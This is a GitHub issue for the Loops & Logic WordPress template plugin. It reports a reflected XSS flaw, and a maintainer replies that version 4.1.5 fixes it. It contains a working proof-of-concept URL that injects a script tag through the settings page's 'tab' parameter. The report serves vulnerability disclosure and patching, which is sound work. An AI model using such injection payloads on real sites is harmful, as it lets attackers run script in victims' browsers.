search

TangibleInc / template-system

A template system for WordPress with content type loops and conditions
https://docs.loopsandlogic.com/reference/template-system/
8 stars 3 forks source link

XSS vulerability requiring immediate patch #126

Closed GabrielGallagher closed 2 months ago

GabrielGallagher commented 2 months ago

How to reproduce Reflected XSS

Steps to Reproduce

After installing the plugin you can visit this html to trigger the XSS:

http://localhost/wp-admin/options-general.php?page=tangible-loops-and-logic-settings&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Additional Information

Environment

Wordpress: 6.5.2 PHP: php:8.1-fpm This POC use nginx configuration from https://github.com/dimasma0305/dockerized-wordpress-debug-setup

eliot-akira commented 2 months ago

Thank you for the information. L&L version 4.1.5 has been released with a fix.